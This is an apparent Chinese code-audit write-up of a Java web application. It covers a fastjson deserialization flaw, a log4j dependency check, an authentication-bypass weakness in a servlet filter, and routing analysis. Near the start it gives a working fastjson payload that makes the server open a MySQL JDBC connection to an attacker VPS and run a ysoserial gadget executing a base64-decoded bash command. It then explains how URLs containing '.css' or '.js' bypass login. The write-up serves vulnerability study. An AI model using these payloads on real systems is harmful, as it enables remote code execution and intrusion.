<p>根据路由分析这里的apiName为user这样能够寻找到UserComponent里的select方法</p>
<p><strong>测试</strong></p>
<p>抓包设置payload</p>
<div class=highlight><pre><span></span><span class=o>{</span><span class=s>"@type"</span><span class=o>:</span><span class=s>"java.net.Inet4Address"</span><span class=o>,</span><span class=s>"val"</span><span class=o>:</span><span class=s>"xxxxxx"</span><span class=o>}</span>
</pre></div>
<p><a id=img2 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201232916-a8cd8460-c116-1.png><img src="data:image/png;base64,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
<p>收到DNS请求证明漏洞存在</p>
<p><a id=img3 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201232940-b756f214-c116-1.png><img src=data:image/png;base64,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
<p>接下来可以进行LDAP注入但是需要确定AutoType是否开启</p>
<p>可以通过以下代码开启</p>
<div class=highlight><pre><span></span><span class=n>ParserConfig</span><span class=o>.</span><span class=na>getGlobalInstance</span><span class=o>().</span><span class=na>setAutoTypeSupport</span><span class=o>(</span><span class=kc>true</span><span class=o>);</span>
</pre></div>
<p>但是在实际测试的过程中没有开启可以通过mysql服务来打</p>
<p>payload</p>
<div class=highlight><pre><span></span><span class=p>{</span>
<span class=nt>"@type"</span><span class=p>:</span> <span class=s2>"java.lang.AutoCloseable"</span><span class=p>,</span>
<span class=nt>"@type"</span><span class=p>:</span> <span class=s2>"com.mysql.jdbc.JDBC4Connection"</span><span class=p>,</span>
<span class=nt>"hostToConnectTo"</span><span class=p>:</span> <span class=s2>"vpsip"</span><span class=p>,</span>
<span class=nt>"portToConnectTo"</span><span class=p>:</span> <span class=mi>3306</span><span class=p>,</span>
<span class=nt>"info"</span><span class=p>:</span> <span class=p>{</span>
<span class=nt>"user"</span><span class=p>:</span> <span class=s2>"yso_CommonsCollections6_bash -c {echo,xxxxx}|{base64,-d}|{bash,-i}"</span><span class=p>,</span>
<span class=nt>"password"</span><span class=p>:</span> <span class=s2>"pass"</span><span class=p>,</span>
<span class=nt>"statementInterceptors"</span><span class=p>:</span> <span class=s2>"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor"</span><span class=p>,</span>
<span class=nt>"autoDeserialize"</span><span class=p>:</span> <span class=s2>"true"</span><span class=p>,</span>
<span class=nt>"NUM_HOSTS"</span><span class=p>:</span> <span class=s2>"1"</span>
<span class=p>},</span>
<span class=nt>"databaseToConnectTo"</span><span class=p>:</span> <span class=s2>"dbname"</span><span class=p>,</span>
<span class=nt>"url"</span><span class=p>:</span> <span class=s2>""</span>
<span class=p>}</span>
</pre></div>
<p>参考:<a href=https://www.cnblogs.com/kingbridge/articles/16720318.html target=_blank>蓝帽杯2022决赛 - 赌怪 writeup - KingBridge - 博客园 (cnblogs.com)</a></p>
<p>这里就不继续测试大致原理是这样如果不懂fastjson请参考<a href=https://dililearngent.github.io/2023/02/10/fastjson-security/ target=_blank>Java安全之FastJson漏洞分析与利用 | DiliLearngent's Blog</a></p>
<p><strong>依赖log4j</strong></p>
<div class=highlight><pre><span></span><span class=nt>&lt;dependency&gt;</span>
<span class=nt>&lt;groupId&gt;</span>org.apache.logging.log4j<span class=nt>&lt;/groupId&gt;</span>
<span class=nt>&lt;artifactId&gt;</span>log4j-to-slf4j<span class=nt>&lt;/artifactId&gt;</span>
<span class=nt>&lt;version&gt;</span>2.10.0<span class=nt>&lt;/version&gt;</span>
<span class=nt>&lt;scope&gt;</span>compile<span class=nt>&lt;/scope&gt;</span>
<span class=nt>&lt;/dependency&gt;</span>
</pre></div>
<p>无相关漏洞可以通过官方文档或者maven仓库中查看<a href=https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-to-slf4j target=_blank>Maven Repository: org.apache.logging.log4j » log4j-to-slf4j (mvnrepository.com)</a></p>
<ul>
<li>还有一些配置文件这里没有涉及到就不提了</li>
</ul>
<h2 id=toc-4>Filter分析</h2>
<p>在项目中只存在一个Filter类即LogCostFilter观察其doFilter方法</p>
<div class=highlight><pre><span></span><span class=nd>@Override</span>
<span class=kd>public</span> <span class=kt>void</span> <span class=nf>doFilter</span><span class=o>(</span><span class=n>ServletRequest</span> <span class=n>request</span><span class=o>,</span> <span class=n>ServletResponse</span> <span class=n>response</span><span class=o>,</span>
<span class=n>FilterChain</span> <span class=n>chain</span><span class=o>)</span> <span class=kd>throws</span> <span class=n>IOException</span><span class=o>,</span> <span class=n>ServletException</span> <span class=o>{</span>
<span class=n>HttpServletRequest</span> <span class=n>servletRequest</span> <span class=o>=</span> <span class=o>(</span><span class=n>HttpServletRequest</span><span class=o>)</span> <span class=n>request</span><span class=o>;</span>
<span class=n>HttpServletResponse</span> <span class=n>servletResponse</span> <span class=o>=</span> <span class=o>(</span><span class=n>HttpServletResponse</span><span class=o>)</span> <span class=n>response</span><span class=o>;</span>
<span class=n>String</span> <span class=n>requestUrl</span> <span class=o>=</span> <span class=n>servletRequest</span><span class=o>.</span><span class=na>getRequestURI</span><span class=o>();</span>
<span class=c1>//具体,比如:处理若用户未登录,则跳转到登录页</span>
<span class=n>Object</span> <span class=n>userInfo</span> <span class=o>=</span> <span class=n>servletRequest</span><span class=o>.</span><span class=na>getSession</span><span class=o>().</span><span class=na>getAttribute</span><span class=o>(</span><span class=s>"user"</span><span class=o>);</span>
<span class=k>if</span><span class=o>(</span><span class=n>userInfo</span><span class=o>!=</span><span class=kc>null</span><span class=o>)</span> <span class=o>{</span> <span class=c1>//如果已登录,不阻止</span>
<span class=n>chain</span><span class=o>.</span><span class=na>doFilter</span><span class=o>(</span><span class=n>request</span><span class=o>,</span> <span class=n>response</span><span class=o>);</span>
<span class=k>return</span><span class=o>;</span>
<span class=o>}</span>
<span class=k>if</span> <span class=o>(</span><span class=n>requestUrl</span> <span class=o>!=</span> <span class=kc>null</span> <span class=o>&amp;&amp;</span> <span class=o>(</span><span class=n>requestUrl</span><span class=o>.</span><span class=na>contains</span><span class=o>(</span><span class=s>"/doc.html"</span><span class=o>)</span> <span class=o>||</span>
<span class=n>requestUrl</span><span class=o>.</span><span class=na>contains</span><span class=o>(</span><span class=s>"/register.html"</span><span class=o>)</span> <span class=o>||</span> <span class=n>requestUrl</span><span class=o>.</span><span class=na>contains</span><span class=o>(</span><span class=s>"/login.html"</span><span class=o>)))</span> <span class=o>{</span>
<span class=n>chain</span><span class=o>.</span><span class=na>doFilter</span><span class=o>(</span><span class=n>request</span><span class=o>,</span> <span class=n>response</span><span class=o>);</span>
<span class=k>return</span><span class=o>;</span>
<span class=o>}</span>
<span class=c1>// 使用ignoredList中内容进行认证</span>
<span class=k>if</span> <span class=o>(</span><span class=n>verify</span><span class=o>(</span><span class=n>ignoredList</span><span class=o>,</span> <span class=n>requestUrl</span><span class=o>))</span> <span class=o>{</span>
<span class=n>chain</span><span class=o>.</span><span class=na>doFilter</span><span class=o>(</span><span class=n>servletRequest</span><span class=o>,</span> <span class=n>response</span><span class=o>);</span>
<span class=k>return</span><span class=o>;</span>
<span class=o>}</span>
<span class=c1>// 白名单过滤</span>
<span class=k>if</span> <span class=o>(</span><span class=kc>null</span> <span class=o>!=</span> <span class=n>allowUrls</span> <span class=o>&amp;&amp;</span> <span class=n>allowUrls</span><span class=o>.</span><span class=na>length</span> <span class=o>&gt;</span> <span class=mi>0</span><span class=o>)</span> <span class=o>{</span>
<span class=k>for</span> <span class=o>(</span><span class=n>String</span> <span class=n>url</span> <span class=o>:</span> <span class=n>allowUrls</span><span class=o>)</span> <span class=o>{</span>
<span class=k>if</span> <span class=o>(</span><span class=n>requestUrl</span><span class=o>.</span><span class=na>startsWith</span><span class=o>(</span><span class=n>url</span><span class=o>))</span> <span class=o>{</span>
<span class=n>chain</span><span class=o>.</span><span class=na>doFilter</span><span class=o>(</span><span class=n>request</span><span class=o>,</span> <span class=n>response</span><span class=o>);</span>
<span class=k>return</span><span class=o>;</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=n>servletResponse</span><span class=o>.</span><span class=na>sendRedirect</span><span class=o>(</span><span class=s>"/login.html"</span><span class=o>);</span>
<span class=o>}</span>
</pre></div>
<p>根据对init方法的分析可知ignoredUrls为[.css.js.jpg.png.gif.ico]allowUrls为[/user/login/user/registerUser/v2/api-docs]</p>
<p>先看verify方法</p>
<div class=highlight><pre><span></span><span class=kd>private</span> <span class=kd>static</span> <span class=n>String</span> <span class=n>regexPrefix</span> <span class=o>=</span> <span class=s>"^.*"</span><span class=o>;</span>
<span class=kd>private</span> <span class=kd>static</span> <span class=n>String</span> <span class=n>regexSuffix</span> <span class=o>=</span> <span class=s>".*$"</span><span class=o>;</span>
<span class=kd>private</span> <span class=kd>static</span> <span class=kt>boolean</span> <span class=nf>verify</span><span class=o>(</span><span class=n>List</span><span class=o>&lt;</span><span class=n>String</span><span class=o>&gt;</span> <span class=n>ignoredList</span><span class=o>,</span> <span class=n>String</span> <span class=n>url</span><span class=o>)</span> <span class=o>{</span>
<span class=k>for</span> <span class=o>(</span><span class=n>String</span> <span class=n>regex</span> <span class=o>:</span> <span class=n>ignoredList</span><span class=o>)</span> <span class=o>{</span>
<span class=n>Pattern</span> <span class=n>pattern</span> <span class=o>=</span> <span class=n>Pattern</span><span class=o>.</span><span class=na>compile</span><span class=o>(</span><span class=n>regexPrefix</span> <span class=o>+</span> <span class=n>regex</span> <span class=o>+</span> <span class=n>regexSuffix</span><span class=o>);</span>
<span class=n>Matcher</span> <span class=n>matcher</span> <span class=o>=</span> <span class=n>pattern</span><span class=o>.</span><span class=na>matcher</span><span class=o>(</span><span class=n>url</span><span class=o>);</span>
<span class=k>if</span> <span class=o>(</span><span class=n>matcher</span><span class=o>.</span><span class=na>matches</span><span class=o>())</span> <span class=o>{</span>
<span class=k>return</span> <span class=kc>true</span><span class=o>;</span>
<span class=o>}</span>
<span class=o>}</span>
<span class=k>return</span> <span class=kc>false</span><span class=o>;</span>
<span class=o>}</span>
</pre></div>
<p>将ignoredUrls中的逐个元素拼接成正则表达式后与当前url进行匹配匹配成功即返回true例如第一个元素形成的正则表达式为<code>^.*.css.*$</code>即只要包含ignoredUrls中的任意一个元素即可在不登录的情况下访问</p>
<p>在白名单过滤中只要请求url中以/user/login、/user/registerUser、/v2/api-docs开头即不需要登陆即可访问</p>
<h2 id=toc-5>路由分析</h2>
<p>大部分请求路径都包含在Controller文件夹中这里有一个特殊的类即ResourceController.java它的请求路径中包含{apiName}代码中使用CommonQueryManager.java类对其进行处理以select方法为例</p>
<div class=highlight><pre><span></span><span class=kd>public</span> <span class=n>List</span><span class=o>&lt;?&gt;</span> <span class=n>select</span><span class=o>(</span><span class=n>String</span> <span class=n>apiName</span><span class=o>,</span> <span class=n>Map</span><span class=o>&lt;</span><span class=n>String</span><span class=o>,</span> <span class=n>String</span><span class=o>&gt;</span> <span class=n>parameterMap</span><span class=o>)</span><span class=kd>throws</span> <span class=n>Exception</span> <span class=o>{</span>
<span class=k>if</span> <span class=o>(</span><span class=n>StringUtil</span><span class=o>.</span><span class=na>isNotEmpty</span><span class=o>(</span><span class=n>apiName</span><span class=o>))</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>container</span><span class=o>.</span><span class=na>getCommonQuery</span><span class=o>(</span><span class=n>apiName</span><span class=o>).</span><span class=na>select</span><span class=o>(</span><span class=n>parameterMap</span><span class=o>);</span>
<span class=o>}</span>
<span class=k>return</span> <span class=k>new</span> <span class=n>ArrayList</span><span class=o>&lt;</span><span class=n>Object</span><span class=o>&gt;();</span>
<span class=o>}</span>
<span class=kd>public</span> <span class=n>ICommonQuery</span> <span class=nf>getCommonQuery</span><span class=o>(</span><span class=n>String</span> <span class=n>apiName</span><span class=o>)</span> <span class=o>{</span>
<span class=k>return</span> <span class=n>configComponentMap</span><span class=o>.</span><span class=na>get</span><span class=o>(</span><span class=n>apiName</span><span class=o>);</span>
<span class=o>}</span>
</pre></div>
<p>configComponentMap存放的是Component类即如图所示</p>
<p><a id=img4 href=https://xzfile.aliyuncs.com/media/upload/picture/20240201233008-c838f500-c116-1.png><img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAloAAAH3CAYAAABjMfFHAACf5ElEQVR4nOz9a3CTWX7o+38fyzY2so2NDRjMzWAJNbSbhqaZkWd60skk2ZGG2X9XMvTMnheHTipH+iepXaek6vxzqs7mzabOPlUpSs6LnJyx9kzv9rs0npzN7HGkvad35tIXK0A3dKOGMZLBXNpgGhtoX/BFltf/hWRZV1u2JRvZv0+ValpaS+v5PY8Y9GOt37OkKaUUQgghhBBxrl69SmNj42qHUfCKVjsAIYQQQoi1ShItIYQQQog8kURLCCGEECJPilc7ACGEEEIULhUeZ/BOL333HzMyEYLiMiprd7CvaQ915bol910rZEZLCCGEEEui1Dj9n13gSu8Az3SVbN2xg61VGqMPerl86RoPJ9WS+q4lMqMlhBBCiCWZGbxJcHCKsh1H+PrBOkqLNJSaYfzeFXw9A9y8t5dtTVWL7ruWyIyWEEIIIZZk5PFjQuhp2BNJnAA0rYjyhh3UajA6PMx0dBepxfRdS2RGax26e/8hY+PjCa8V63TUb6mlUr9xlaISQghRaCr3HedbezRKSpNbNDSAoqLI/y6y71oiidY6dKd/gMEnT1Nevx7s46ChEcPeXSsfVA547RpWv4tAtwPDagcjhBDrgK6kDF1J6uvTj75kSEH1pmp0mrbovmuJLB2KmBml+Dxwixu37qx2KEsQpMe/2jEIIYRQoUECgQGmS+vZ01Ces76FSma0RIrrvbe53nt73j51NdW89urhlQkoKwYc3QrHaochhBDrmAqPce+qn/6JMra/fIBtpZlnqBbTt5DJjNZz7MGDB/zoRz/iyZMnGfsEAgF+8pOfMJ5UcyWEEEKsJDUzzsC1T7gxpKg2vMzBLSnFWEvqW+gk0XqOjY6OMjg4yDvvvJM22QoEApw7d47h4WEmJiZWIcJMvNg1DS36sHuTmoNttMS1ay1tBOPfbY+85m1ribX/2J7aL75vMOm/M8WS0r5ALEIIIRam1CSDPZf5fGCKqsYjHNlbmbHeajF91wJJtJ5jBoOBN954g7GxsZRkazbJ0uv1vPnmm9TU1Cz5OCUlxRw9dIBvtxzj6KEDlJakqVbMmhe7ZsXvCqCUQilFa09c8uK1oxk7ORlQ0fYALpwYkxMcnxNrz+lIn24Hf95qA18nXfGdgm2ccYPtdIbid68dLSkW1QFd3rj2bGIRQgiRkVIhngSv8NkXE1TseZkjTdWUZEyysu+7Vkii9ZwzGo0pyVYukyyAo4cOsKehnqoKPXsa6jlycBn37AV78APNprkxLI7ZRChI2xk3Nk83jlizAUeHC3NyEoUNT7tl7qnlLVxmH51xnYJdnfiw0WohjcixsHnodsSdj8GBw7LYWIQQQqSjVJjhvit8enuUjbsOc9RYS2nGJCv7vmuJFMMXgNlk69y5c7z99tuMj4/nLMkC2Fpbk/R889IHM5zgpNmJ06rhNidttRDsotMHPquGO81bm3sh1tlsoilxYE6cNOPs7CLocGAgSFenD7Org/R5VuRYttNpWxcXixBCiPRGbnG19ynTukoqioa4HRhK6lDJduN2qjRtcX3XEJnRKhCzyVaukyyAkdGxxOdjYxl6ZiNy958KuDD7nBjT1D3